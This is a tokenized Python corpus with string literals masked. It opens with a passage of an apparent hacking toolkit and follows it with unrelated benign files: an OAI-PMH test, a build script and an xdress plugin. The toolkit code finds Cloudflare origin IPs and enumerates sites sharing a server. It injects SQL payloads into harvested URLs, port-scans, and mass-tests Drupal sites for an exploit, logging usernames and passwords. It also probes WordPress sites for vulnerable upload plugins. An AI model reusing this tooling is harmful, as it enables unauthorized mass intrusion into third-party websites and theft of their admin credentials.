<NUM_LIT:2> : <EOL> resp = urllib2 . urlopen ( site1 + '<STR_LIT>' % site ) . read ( ) <EOL> if '<STR_LIT>' not in resp . lower ( ) : <EOL> print '<STR_LIT>' , site <EOL> userslist . append ( site ) <EOL> break <EOL> else : <EOL> print site <EOL> site = site [ : - <NUM_LIT:1> ] <EOL> except : <EOL> pass <EOL> clearScr ( ) <EOL> for user in userslist : <EOL> print user <EOL> def cloudflareBypasser ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> subdoms = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for site in self . sites : <EOL> site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site . 
replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> try : <EOL> ip = socket . gethostbyname ( site ) <EOL> except socket . error : <EOL> pass <EOL> for sub in subdoms : <EOL> doo = sub + '<STR_LIT:.>' + site <EOL> print '<STR_LIT>' , doo <EOL> try : <EOL> ddd = socket . gethostbyname ( doo ) <EOL> if ddd != ip : <EOL> print '<STR_LIT>' , ddd <EOL> break <EOL> except socket . error : <EOL> pass <EOL> def getServerBanner ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> try : <EOL> s = '<STR_LIT>' + self . serverip <EOL> httpresponse = urllib . urlopen ( s ) <EOL> print '<STR_LIT>' , httpresponse . headers . getheader ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> def grabSqli ( self ) : <EOL> """<STR_LIT>""" <EOL> page = <NUM_LIT:1> <EOL> lista = [ ] <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> x = findwebs [ i ] <EOL> lista . append ( x ) <EOL> except : <EOL> pass <EOL> page += <NUM_LIT:50> <EOL> lista = unique ( lista ) <EOL> self . checkSqli ( lista ) <EOL> def checkSqli ( self , s ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> payloads = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> check = re . compile ( "<STR_LIT>" , re . I ) <EOL> for url in s : <EOL> try : <EOL> for param in url . split ( '<STR_LIT:?>' ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:&>' ) : <EOL> for payload in payloads : <EOL> power = url . replace ( param , param + payload . strip ( ) ) <EOL> html = urllib2 . urlopen ( power ) . readlines ( ) <EOL> for line in html : <EOL> checker = re . 
findall ( check , line ) <EOL> if len ( checker ) != <NUM_LIT:0> : <EOL> print '<STR_LIT>' , power <EOL> except : <EOL> pass <EOL> def portScanner ( self , mode , ran ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> def do_it ( ip , port ) : <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = sock . connect_ex ( ( ip , port ) ) <EOL> if sock == <NUM_LIT:0> : <EOL> print "<STR_LIT>" % port <EOL> if mode == <NUM_LIT:1> : <EOL> a = ran . split ( '<STR_LIT:->' ) <EOL> start = int ( a [ <NUM_LIT:0> ] ) <EOL> end = int ( a [ <NUM_LIT:1> ] ) <EOL> for i in range ( start , end ) : <EOL> do_it ( self . serverip , i ) <EOL> elif mode == <NUM_LIT:2> : <EOL> for port in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> do_it ( self . serverip , port ) <EOL> minu = '''<STR_LIT>''' <EOL> def drupal ( ) : <EOL> '''<STR_LIT>''' <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT:50> : <EOL> url = "<STR_LIT>" + ip + "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> req = urllib2 . Request ( url ) <EOL> opreq = urllib2 . urlopen ( req ) . read ( ) <EOL> findurl = re . findall ( '<STR_LIT>' , opreq ) <EOL> page += <NUM_LIT:1> <EOL> for url in findurl : <EOL> try : <EOL> urlpa = urlparse ( url ) <EOL> site = urlpa . netloc <EOL> print "<STR_LIT>" + site <EOL> resp = urllib2 . urlopen ( '<STR_LIT>' + site + '<STR_LIT>' ) <EOL> read = resp . read ( ) <EOL> if "<STR_LIT>" in read : <EOL> print "<STR_LIT>" + site <EOL> print "<STR_LIT>" <EOL> a = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> a . write ( site + '<STR_LIT:\n>' ) <EOL> a . write ( "<STR_LIT>" + user + "<STR_LIT>" + pwd + "<STR_LIT:\n>" ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> except Exception as ex : <EOL> print ex <EOL> sys . 
exit ( <NUM_LIT:0> ) <EOL> def getdrupal ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> page = <NUM_LIT:1> <EOL> sites = list ( ) <EOL> while page <= <NUM_LIT:50> : <EOL> url = "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> req = urllib2 . Request ( url ) <EOL> opreq = urllib2 . urlopen ( req ) . read ( ) <EOL> findurl = re . findall ( '<STR_LIT>' , opreq ) <EOL> page += <NUM_LIT:1> <EOL> for url in findurl : <EOL> split = urlparse ( url ) <EOL> site = split . netloc <EOL> if site not in sites : <EOL> print site <EOL> sites . append ( site ) <EOL> def drupallist ( ) : <EOL> listop = raw_input ( "<STR_LIT>" ) <EOL> fileopen = open ( listop , '<STR_LIT:r>' ) <EOL> content = fileopen . readlines ( ) <EOL> for i in content : <EOL> url = i . strip ( ) <EOL> try : <EOL> openurl = urllib2 . urlopen ( '<STR_LIT>' + url + '<STR_LIT>' ) <EOL> readcontent = openurl . read ( ) <EOL> if "<STR_LIT>" in readcontent : <EOL> print "<STR_LIT>" + url <EOL> print "<STR_LIT>" <EOL> save = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> save . write ( url + "<STR_LIT:\n>" + "<STR_LIT>" ) <EOL> else : <EOL> print i + "<STR_LIT>" <EOL> except Exception as ex : <EOL> print ex <EOL> def maine ( ) : <EOL> print minu <EOL> choose = raw_input ( "<STR_LIT>" ) <EOL> while True : <EOL> if choose == "<STR_LIT:1>" : <EOL> drupal ( ) <EOL> if choose == "<STR_LIT:2>" : <EOL> getdrupal ( ) <EOL> if choose == "<STR_LIT:3>" : <EOL> drupallist ( ) <EOL> if choose == "<STR_LIT:4>" : <EOL> about ( ) <EOL> if choose == "<STR_LIT>" : <EOL> menu ( ) <EOL> con = raw_input ( '<STR_LIT>' ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:N>' : <EOL> exit ( ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:Y>' : <EOL> maine ( ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . 
add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_wordpress ( sites ) : <EOL> wp = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wp . append ( site ) <EOL> except : <EOL> pass <EOL> return wp <EOL> def check_joomla ( sites ) : <EOL> joomla = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> joomla . 
append ( site ) <EOL> except : <EOL> pass <EOL> return joomla <EOL> def wppjmla ( ) : <EOL> ipp = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ipp ) ) <EOL> wordpress = check_wordpress ( sites ) <EOL> joomla = check_joomla ( sites ) <EOL> for ss in wordpress : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wordpress ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in joomla : <EOL> print ss <EOL> print '<STR_LIT>' , len ( joomla ) , '<STR_LIT>' <EOL> print '<STR_LIT:\n>' <EOL> class tnn ( ) : <EOL> def __init__ ( self ) : <EOL> clearScr ( ) <EOL> aaa = raw_input ( "<STR_LIT>" ) <EOL> TNscan ( aaa ) <EOL> class bcolors : <EOL> HEADER = '<STR_LIT>' <EOL> OKBLUE = '<STR_LIT>' <EOL> OKGREEN = '<STR_LIT>' <EOL> WARNING = '<STR_LIT>' <EOL> FAIL = '<STR_LIT>' <EOL> ENDC = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> class colors ( ) : <EOL> PURPLE = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> DARKCYAN = '<STR_LIT>' <EOL> BLUE = '<STR_LIT>' <EOL> GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> RED = '<STR_LIT>' <EOL> BOLD = '<STR_LIT>' <EOL> ENDC = '<STR_LIT>' <EOL> def grabsqli ( ip ) : <EOL> try : <EOL> print bcolors . OKBLUE + "<STR_LIT>" <EOL> print '<STR_LIT:\n>' <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> bing = "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> sites = findwebs <EOL> for i in sites : <EOL> try : <EOL> response = urllib2 . urlopen ( i ) . read ( ) <EOL> checksqli ( i ) <EOL> except urllib2 . HTTPError , e : <EOL> str ( sites ) . strip ( i ) <EOL> page = page + <NUM_LIT:10> <EOL> except : <EOL> pass <EOL> def checksqli ( sqli ) : <EOL> responsetwo = urllib2 . urlopen ( sqli ) . read ( ) <EOL> find = re . 
findall ( '<STR_LIT>' , responsetwo ) <EOL> if find : <EOL> print ( "<STR_LIT>" + sqli ) <EOL> def sqlscan ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> grabsqli ( ip ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_wordpress ( sites ) : <EOL> wp = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wp . append ( site ) <EOL> except : <EOL> pass <EOL> return wp <EOL> def check_wpstorethemeremotefileupload ( sites ) : <EOL> wpstorethemeremotefileupload = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpstorethemeremotefileupload . append ( site ) <EOL> except : <EOL> pass <EOL> return wpstorethemeremotefileupload <EOL> def check_wpcontactcreativeform ( sites ) : <EOL> wpcontactcreativeform = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpcontactcreativeform . 
append ( site ) <EOL> except : <EOL> pass <EOL> return wpcontactcreativeform <EOL> def check_wplazyseoplugin ( sites ) : <EOL> wplazyseoplugin = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wplazyseoplugin . append ( site ) <EOL> except : <EOL> pass <EOL> return wplazyseoplugin <EOL> def check_wpeasyupload ( sites ) : <EOL> wpeasyupload = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpeasyupload . append ( site ) <EOL> except : <EOL> pass <EOL> return wpeasyupload <EOL> def check_wpsymposium ( sites ) : <EOL> wpsymposium = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpsycmium . append ( site ) <EOL> except : <EOL> pass <EOL> return wpsymposium <EOL> def wpminiscanner ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ip ) ) <EOL> wordpress = check_wordpress ( sites ) <EOL> wpstorethemeremotefileupload = check_wpstorethemeremotefileupload ( sites ) <EOL> wpcontactcreativeform = check_wpcontactcreativeform ( sites ) <EOL> wplazyseoplugin = check_wplazyseoplugin ( sites ) <EOL> wpeasyupload = check_wpeasyupload ( sites ) <EOL> wpsymposium = check_wpsymposium ( sites ) <EOL> for ss in wordpress : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wordpress ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpstorethemeremotefileupload : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpstorethemeremotefileupload ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpcontactcreativeform : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpcontactcreativeform ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wplazyseoplugin : <EOL> print ss <EOL> print '<STR_LIT>' , len ( 
wplazyseoplugin ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpeasyupload : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpeasyupload ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpsymposium : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpsymposium ) , '<STR_LIT>' <EOL> print '<STR_LIT:\n>' <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> menu ( ) </s>
<s> from unittest import TestCase , TestSuite , main , makeSuite <EOL> from fakeclient import FakeClient , GranularityFakeClient , TestError <EOL> import os <EOL> from datetime import datetime <EOL> from oaipmh import common , metadata , validation , error <EOL> directory = os . path . dirname ( __file__ ) <EOL> fake42 = os . path . join ( directory , '<STR_LIT>' ) <EOL> fakeclient = FakeClient ( fake42 ) <EOL> fakeclient . getMetadataRegistry ( ) . registerReader ( <EOL> '<STR_LIT>' , metadata . oai_dc_reader ) <EOL> class ResumptionTestCase ( TestCase ) : <EOL> def test_withoutToken ( self ) : <EOL> records = fakeclient . listRecords ( metadataPrefix = '<STR_LIT>' ) <EOL> records = list ( records ) <EOL> self . assertEqual ( len ( records ) , <NUM_LIT> ) <EOL> def test_withToken ( self ) : <EOL> records = fakeclient . listRecords ( resumptionToken = '<STR_LIT>' , <EOL> metadataPrefix = '<STR_LIT>' ) <EOL> records = list ( records ) <EOL> self . assertEqual ( len ( records ) , <NUM_LIT> ) <EOL> def test_suite ( ) : <EOL> return TestSuite ( ( makeSuite ( ResumptionTestCase ) , ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( defaultTest = '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import subprocess <EOL> PKG = "<STR_LIT>" <EOL> version = "<STR_LIT:test>" <EOL> def setup ( ) : <EOL> try : <EOL> from setuptools import setup as setup_ <EOL> except ImportError : <EOL> from distutils . core import setup as setup_ <EOL> scripts = [ ] <EOL> packages = [ PKG , PKG + '<STR_LIT>' ] <EOL> pack_dir = { PKG : PKG , PKG + '<STR_LIT>' : os . path . join ( PKG , '<STR_LIT>' ) } <EOL> extpttn = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> pack_data = { PKG : [ '<STR_LIT>' , '<STR_LIT>' , ] + extpttn , PKG + '<STR_LIT>' : extpttn } <EOL> setup_kwargs = { <EOL> "<STR_LIT:name>" : PKG , <EOL> "<STR_LIT:version>" : version , <EOL> "<STR_LIT:description>" : "<STR_LIT>" . format ( PKG ) , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:url>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : packages , <EOL> "<STR_LIT>" : pack_dir , <EOL> "<STR_LIT>" : pack_data , <EOL> "<STR_LIT>" : scripts , <EOL> } <EOL> rtn = setup_ ( ** setup_kwargs ) <EOL> def parse_args ( ) : <EOL> distutils = [ ] <EOL> cmake = [ ] <EOL> make = [ ] <EOL> argsets = [ distutils , cmake , make ] <EOL> i = <NUM_LIT:0> <EOL> for arg in sys . argv : <EOL> if arg == '<STR_LIT>' : <EOL> i += <NUM_LIT:1> <EOL> else : <EOL> argsets [ i ] . append ( arg ) <EOL> hdf5opt = [ o . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] for o in distutils if o . startswith ( '<STR_LIT>' ) ] <EOL> if <NUM_LIT:0> < len ( hdf5opt ) : <EOL> os . environ [ '<STR_LIT>' ] = hdf5opt [ <NUM_LIT:0> ] <EOL> distutils = [ o for o in distutils if not o . startswith ( '<STR_LIT>' ) ] <EOL> return distutils , cmake , make <EOL> def main_body ( ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> sys . argv , cmake_args , make_args = parse_args ( ) <EOL> makefile = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . 
exists ( makefile ) : <EOL> cmake_cmd = [ '<STR_LIT>' , '<STR_LIT:..>' ] + cmake_args <EOL> cmake_cmd += [ '<STR_LIT>' + sys . executable , ] <EOL> if os . name == '<STR_LIT>' : <EOL> files_on_path = set ( ) <EOL> for p in os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) [ : : - <NUM_LIT:1> ] : <EOL> if os . path . exists ( p ) : <EOL> files_on_path . update ( os . listdir ( p ) ) <EOL> if '<STR_LIT>' in files_on_path : <EOL> pass <EOL> elif '<STR_LIT>' in files_on_path : <EOL> cmake_cmd += [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in files_on_path : <EOL> cmake_cmd += [ '<STR_LIT>' ] <EOL> cmake_cmd = '<STR_LIT:U+0020>' . join ( cmake_cmd ) <EOL> rtn = subprocess . check_call ( cmake_cmd , cwd = '<STR_LIT>' , shell = ( os . name == '<STR_LIT>' ) ) <EOL> rtn = subprocess . check_call ( [ '<STR_LIT>' ] + make_args , cwd = '<STR_LIT>' ) <EOL> cwd = os . getcwd ( ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> setup ( ) <EOL> os . chdir ( cwd ) <EOL> def main ( ) : <EOL> success = False <EOL> try : <EOL> main_body ( ) <EOL> success = True <EOL> finally : <EOL> print ( "<STR_LIT>" . format ( success ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import collections <EOL> from . utils import isclassdesc , NotSpecified <EOL> from . types . matching import TypeMatcher <EOL> from . plugins import Plugin <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> basestring = str <EOL> def modify_desc ( skips , desc ) : <EOL> """<STR_LIT>""" <EOL> for at_name , at_t in desc [ '<STR_LIT>' ] . copy ( ) . items ( ) : <EOL> for tm in skips : <EOL> if tm . flatmatches ( at_t ) : <EOL> del desc [ '<STR_LIT>' ] [ at_name ] <EOL> break <EOL> for m_key , m_ret in desc [ '<STR_LIT>' ] . copy ( ) . items ( ) : <EOL> _deleted = False <EOL> for tm in skips : <EOL> if m_ret and tm . flatmatches ( m_ret [ '<STR_LIT>' ] ) : <EOL> del desc [ '<STR_LIT>' ] [ m_key ] <EOL> _deleted = True <EOL> break <EOL> if _deleted : <EOL> continue <EOL> m_args = m_key [ <NUM_LIT:1> : ] <EOL> for arg in m_args : <EOL> t = arg [ <NUM_LIT:1> ] <EOL> for tm in skips : <EOL> if tm . flatmatches ( t ) : <EOL> del desc [ '<STR_LIT>' ] [ m_key ] <EOL> _deleted = True <EOL> break <EOL> if _deleted : <EOL> break <EOL> class XDressPlugin ( Plugin ) : <EOL> """<STR_LIT>""" <EOL> requires = ( '<STR_LIT>' , ) <EOL> defaultrc = { '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified } <EOL> rcdocs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def setup ( self , rc ) : <EOL> if rc . skiptypes is NotSpecified : <EOL> return <EOL> if isinstance ( rc . skiptypes , collections . Mapping ) : <EOL> _skippers = { } <EOL> for kls in rc . skiptypes . keys ( ) : <EOL> _skippers [ kls ] = [ TypeMatcher ( t ) for t in rc . skiptypes [ kls ] ] <EOL> rc . skiptypes = _skippers <EOL> elif isinstance ( rc . skiptypes , collections . 
Sequence ) : <EOL> rc . skiptypes = [ TypeMatcher ( t ) for t in rc . skiptypes ] <EOL> if rc . verbose : <EOL> print ( "<STR_LIT>" . format ( rc . skiptypes ) ) <EOL> def skip_types ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skiptypes is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> if isinstance ( rc . skiptypes , collections . Mapping ) : <EOL> skip_classes = rc . skiptypes . keys ( ) <EOL> for mod_key , mod in rc . env . items ( ) : <EOL> for kls_key , desc in mod . items ( ) : <EOL> if isclassdesc ( desc ) : <EOL> if desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skips = rc . skips [ desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ] <EOL> modify_desc ( skips , desc ) <EOL> elif isinstance ( rc . skiptypes , collections . Sequence ) : <EOL> for mod_key , mod in rc . env . items ( ) : <EOL> for kls_key , desc in mod . items ( ) : <EOL> if isclassdesc ( desc ) : <EOL> skips = rc . skiptypes <EOL> modify_desc ( skips , desc ) <EOL> def skip_methods ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipmethods is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> skip_classes = rc . skipmethods . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skippers = rc . skipmethods [ k_key ] <EOL> m_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] . keys ( ) <EOL> for m in skippers : <EOL> try : <EOL> f = lambda x : x [ <NUM_LIT:0> ] . startswith ( m ) if isinstance ( x [ <NUM_LIT:0> ] , basestring ) else x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . startswith ( m ) <EOL> del_key = filter ( f , m_nms ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> print ( msg . format ( m , k_key ) ) <EOL> continue <EOL> del rc . 
env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ del_key ] <EOL> def skip_attrs ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipattrs is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> skip_classes = rc . skipattrs . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skippers = rc . skipattrs [ k_key ] <EOL> a_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] <EOL> for m in skippers : <EOL> if m in a_nms : <EOL> del rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ m ] <EOL> else : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> print ( msg . format ( m , k_key ) ) <EOL> def include_methods ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . includemethods is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> inc_classes = rc . includemethods . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in inc_classes : <EOL> keeps = set ( rc . includemethods [ k_key ] ) <EOL> m_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] . keys ( ) <EOL> m_keep = filter ( lambda x : x [ <NUM_LIT:0> ] in keeps , m_nms ) <EOL> new_meths = { } <EOL> for mm in m_keep : <EOL> new_meths [ mm ] = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ mm ] <EOL> rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] = new_meths <EOL> def skip_auto ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipauto is NotSpecified : <EOL> return <EOL> ts = rc . ts <EOL> for src_name , cls_dict in rc . env . items ( ) : <EOL> for cls_name , cls_desc in cls_dict . items ( ) : <EOL> if isclassdesc ( cls_desc ) : <EOL> attr_blacklist = [ ] <EOL> for a_name , a_type in cls_desc [ '<STR_LIT>' ] . items ( ) : <EOL> try : <EOL> ts . 
canon ( a_type ) <EOL> except TypeError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> a_name , cls_name , a_type ) ) <EOL> attr_blacklist . append ( a_name ) <EOL> for a in attr_blacklist : <EOL> del cls_desc [ '<STR_LIT>' ] [ a ] <EOL> method_blacklist = [ ] <EOL> for m_sig , m_attr in cls_desc [ '<STR_LIT>' ] . items ( ) : <EOL> m_name = m_sig [ <NUM_LIT:0> ] <EOL> try : <EOL> if m_attr is not None : <EOL> r_type = m_attr [ '<STR_LIT>' ] <EOL> arg_type = r_type <EOL> ts . canon ( r_type ) <EOL> pass <EOL> for _ , arg_type in m_sig [ <NUM_LIT:1> : ] : <EOL> ts . canon ( arg_type ) <EOL> except TypeError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> m_name , cls_name , arg_type ) ) <EOL> method_blacklist . append ( m_sig ) <EOL> for m in method_blacklist : <EOL> del cls_desc [ '<STR_LIT>' ] [ m ] <EOL> def execute ( self , rc ) : <EOL> self . skip_types ( rc ) <EOL> self . skip_methods ( rc ) <EOL> self . skip_attrs ( rc ) <EOL> self . skip_auto ( rc ) <EOL> self . include_methods ( rc ) </s>
